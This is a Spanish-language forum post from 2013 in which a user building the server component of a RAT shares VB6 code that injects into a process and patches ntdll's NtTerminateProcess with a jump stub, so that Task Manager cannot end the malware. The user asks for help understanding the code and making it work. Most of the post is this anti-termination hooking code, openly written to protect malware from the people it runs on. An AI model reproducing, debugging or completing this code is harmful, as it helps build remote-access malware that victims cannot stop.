Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - kayser

Páginas1
#1
Visual Basic / NtTerminateProcess Hook
Septiembre 23, 2013, 10:37:23 AM
Hola gente, he estado investigando ultimamente un poco sobre metodos de como proteger la ejecucion del servidor de mi RAT y al final me he decidido a hacer un hook a la API NtTerminateProcess para evitar que la ejecucion del servidor pueda ser interrumpida desde el administrador de tareas. Se que hay maneras mucho mejores de hacer lo que quiero pero queria algo no muy complicado para una primera version del RAT y con protegerlo del usuario medio que intentara pararlo desde el administrador de tareas me basta. He estado intentando hacerlo yo solo pero solo conseguia que el programa crasheara asi que me he puesto a buscar por la red si alguien habia hecho esto mismo en VB6. Al final he encontrado este codigo:

Código: vb
    Option Explicit 
     
    Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
    Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
    Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByVal Destination As Long, ByVal Source As Long, ByVal Length As Long) 
    Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
    Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
    Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
    Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
    Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    Private Declare Function EnumProcessModules Lib "psapi" (ByVal hProcess As Long, ByRef lphModule As Long, ByVal cb As Long, ByVal lpcbNeeded As Long) As Long
    Private Declare Function GetModuleFileNameEx Lib "psapi" Alias "GetModuleFileNameExA" (ByVal hProcess As Long, ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
     
    Private Const MEM_RELEASE = &H8000 
    Private Const MEM_COMMIT = &H1000 
    Private Const MEM_RESERVE = &H2000 
    Private Const PAGE_EXECUTE_READWRITE = &H40 
    Private Const PROCESS_ALL_ACCESS = &H1F0FFF 
     
    Private hProcess As Long
    Private FuncAddr As Long
    Private OldCode(4) As Byte
    Private NewCode(4) As Byte
    Private HookCode(4) As Byte
    Private CodeAddr As Long
     
    Private Function GetModuleHandleEx(ByVal hProcess As Long, ByVal ModuleName As String) As Long
    Dim hMods(1024) As Long
    Dim cbNeeded As Long
    Dim szModName As String
    Dim i As Integer
     
    If EnumProcessModules(hProcess, hMods(0), 1025 * 4, VarPtr(cbNeeded)) Then
        For i = 0 To (cbNeeded / 4) 
            If hMods(i) Then
                szModName = String(260, 0) 
                If GetModuleFileNameEx(hProcess, hMods(i), szModName, Len(szModName)) Then
                    szModName = Left(szModName, InStr(1, szModName, Chr(0)) - 1) 
                    If LCase(szModName) = LCase(ModuleName) Then ' 
                        GetModuleHandleEx = hMods(i) 
                        Erase hMods 
                        Exit Function
                    End If
                End If
            End If
        Next i 
    End If
    Erase hMods 
    End Function
     
    Public Function HookNtTerminateProcess(ByVal ProcessId As Long) As Boolean
    Dim hMod As Long
     
    NewCode(0) = &HE9 ' jmp 
    ' xor eax,eax 
    ' ret 8 
    HookCode(0) = &H33 
    HookCode(1) = &HC0 
    HookCode(2) = &HC2 
    HookCode(3) = &H8 
    HookCode(4) = &H0 
     
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, False, ProcessId) 
     
    If hProcess Then
        hMod = GetModuleHandleEx(hProcess, "c:\windows\system32\ntdll.dll") 
        If hMod Then
            FuncAddr = GetProcAddress(hMod, "NtTerminateProcess") 
            If FuncAddr Then
                ReadProcessMemory hProcess, ByVal FuncAddr, OldCode(0), 5, 0 
                CodeAddr = VirtualAllocEx(hProcess, ByVal 0, 5, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE) 
                If CodeAddr Then
                    CopyMemory VarPtr(NewCode(1)), VarPtr(CodeAddr - FuncAddr - 5), 4 
                    WriteProcessMemory hProcess, ByVal CodeAddr, HookCode(0), 5, 0 
                    WriteProcessMemory hProcess, ByVal FuncAddr, NewCode(0), 5, 0 
                    HookNtTerminateProcess = True
                End If
            End If
        End If
    End If
    End Function
     
    Public Sub UnhookNtTerminateProcess() 
    WriteProcessMemory hProcess, ByVal FuncAddr, OldCode(0), 5, 0 
    VirtualFreeEx hProcess, ByVal CodeAddr, 5, MEM_RELEASE 
    CloseHandle hProcess 
    End Sub


El caso es que no consigo comprender el codigo al 100% y este no funciona de ninguna manera...

Alguien me echa una mano a comprenderlo y ver porque no funciona?

Un saludo  ;)
Páginas1